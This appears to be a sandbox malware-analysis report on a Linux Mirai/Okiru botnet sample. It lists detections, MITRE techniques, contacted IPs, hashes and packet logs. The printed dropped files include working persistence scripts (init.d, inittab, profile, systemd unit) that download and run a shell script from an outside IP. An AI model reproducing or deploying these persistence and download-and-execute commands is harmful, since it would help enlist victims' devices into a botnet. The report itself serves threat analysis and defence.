Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5631/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5730/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5629/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5728/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5729/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5621/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5720/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5622/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5721/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5623/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5722/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5624/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5723/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5625/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5724/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5626/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5725/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5627/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5704/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5726/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5628/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	File opened: /proc/5727/status	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5541)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5565)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5567)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5569)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5570)	Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5572)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5574)	Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 5566)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 5571)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh			Jump to behavior

Source: /bin/sh (PID: 5573)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 5550)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5528)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5566)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5571)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5528)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/x86_64.nn.elf (PID: 5528)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5569)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_64.nn.elf (PID: 5528)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 5569)	File: /etc/init.d/sh			Jump to dropped file

Sample deletes itself

Source: /tmp/x86_64.nn.elf (PID: 5578)

File: /tmp/x86_64.nn.elf

Jump to behavior

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match	File source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_64.nn.elf PID: 5528, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match	File source: 5528.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_64.nn.elf PID: 5528, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label
x86_64.nn.elf	26%	ReversingLabs	Linux.Backdoor.Mirai
x86_64.nn.elf	100%	Avira	EXP/ELF.Mirai.W
x86_64.nn.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/etc/init.d/sh	3%	ReversingLabs	Text.Browser.Generic
/etc/init.d/system	3%	ReversingLabs	Text.Browser.Generic
/etc/rc.local	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://94.156.227.233/lol.sh	x86_64.nn.elf, 5528.1.00007ffc1abc7000.00007ffc1abe8000.rw-.sdmp	false	high
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	x86_64.nn.elf	false	high
http://94.156.227.233/	x86_64.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.227.234	unknown	Bulgaria		57463	NETIXBG	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
94.156.227.234	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	m68k.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.24
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	splarm6.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	jklarm6.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	arm.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	162.213.35.24
	arm6.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	m68k.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	arm7.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	mipsel.elf	Get hash	malicious	Unknown	Browse	162.213.35.25

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETIXBG	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/sh	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.663595298101345
Encrypted:	false
SSDEEP:	3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
MD5:	3290F4F4E0B77B577C59026DEF246CEE
SHA1:	C51EAE7170430B5697B881BE716280D1FAAA9147
SHA-256:	534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
SHA-512:	DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	355
Entropy (8bit):	4.416220583499086
Encrypted:	false
SSDEEP:	6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
MD5:	4C835AF4434E28E5B56D8CDFA8EE753D
SHA1:	B18DA30B2DF68AE4C788540CED328CA545C02F42
SHA-256:	CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
SHA-512:	877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.615605979741142
Encrypted:	false
SSDEEP:	3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
MD5:	FE7F857A52EC42881A76D01D4A4A1C3C
SHA1:	6391FE715F06AB2D7E58D18A41ED3A358C7E820C
SHA-256:	20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
SHA-512:	4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.612417623467759
Encrypted:	false
SSDEEP:	3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
MD5:	175C6814BBE06EB5816EFE3FE3934230
SHA1:	8C1A49BF7CA134E8AD0DDA70872367062BC600C5
SHA-256:	11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
SHA-512:	C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.486383977913608
Encrypted:	false
SSDEEP:	3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
MD5:	CEC61C0CDC61AB271C45B85281469388
SHA1:	E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
SHA-256:	AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
SHA-512:	71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
Malicious:	true
Preview:	/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.064804988275458
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
MD5:	8156A50E9D158639626649BD134E7D5D
SHA1:	D95D108656621F4B4F82B93CA0694D66F4A2FEF4
SHA-256:	FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
SHA-512:	DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

Static File Info

General

File type:
Entropy (8bit):	6.3316571525689405
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	x86_64.nn.elf
File size:	80'064 bytes
MD5:	3c2e0d786a9ca6565062a422428fe948
SHA1:	6fd38914e40cb082a125277374ba34fee0432be9
SHA256:	4f81276d66252a396b6282b76acc26275c502dcdcf43620e741de6868db67b96
SHA512:	d5c2a53c47aba3f1d646598bcea372fc781bfc040cf5aa385c2cebde20eebf90f2af912b713b9f399011e2011d87e26afd70c3635fe62e15553a5a6518d0521c
SSDEEP:	1536:WRVmSnfG9t8olXAFRPi+h991qpavGVHcdYpC:QmSfGP8olwFRPi+B1qpacHcdh
TLSH:	F3733A07B88090FCC949C27457AFF23BD976B06D1139B2AA27D8FB226F49D605F1E944
File Content Preview:	.ELF..............>.......@.....@.......@6..........@.8...@.......................@.......@.....0/......0/.......................0.......0Q......0Q............../..............Q.td....................................................H...._........H........

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 05:57:53.431027889 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:53.551079035 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:53.551151037 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:53.551194906 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:53.671004057 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:54.070621014 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:54.233376980 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:54.684859037 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:54.684943914 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:55.108043909 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:55.228323936 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:55.228410959 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:55.228410959 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:55.348242998 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:55.747729063 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:55.909384012 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:56.366486073 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:56.366569996 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:56.751560926 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:56.871543884 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:56.871659040 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:56.871659040 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:56.991441011 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:57.452616930 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:57.613301992 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:57.992197037 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:57.993494987 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:58.455261946 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:58.575098038 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:58.575164080 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:58.575165033 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:58.695111990 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:59.082182884 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:57:59.245454073 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:59.699472904 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 24, 2024 05:57:59.699582100 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:00.084199905 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:00.204229116 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:00.204315901 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:00.204355955 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:00.324151993 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:00.710665941 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:00.873163939 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:01.325361013 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:01.325473070 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:01.712681055 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:01.832765102 CET	38242	38208	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:01.832833052 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:01.832864046 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:01.952639103 CET	38242	38208	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:02.338746071 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:02.501599073 CET	38242	38208	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:02.961723089 CET	38242	38208	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:02.961818933 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:03.340471983 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:03.460150957 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:03.460222006 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:03.460270882 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:03.580095053 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:03.968097925 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:04.129298925 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:04.583560944 CET	38242	38210	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:04.583623886 CET	38210	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:04.969986916 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:05.090101957 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:05.090164900 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:05.090164900 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:05.210030079 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:05.594778061 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:05.761089087 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:06.216423988 CET	38242	38212	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:06.216526031 CET	38212	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:06.596055031 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:06.715868950 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:06.715940952 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:06.715971947 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:06.835661888 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:07.220478058 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:07.381315947 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:07.833385944 CET	38242	38214	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:07.833440065 CET	38214	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:08.222171068 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:08.342360973 CET	38242	38216	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:08.342437029 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:08.342454910 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:08.462517977 CET	38242	38216	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:08.847333908 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:09.009550095 CET	38242	38216	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:09.472296000 CET	38242	38216	94.156.227.234	192.168.2.15
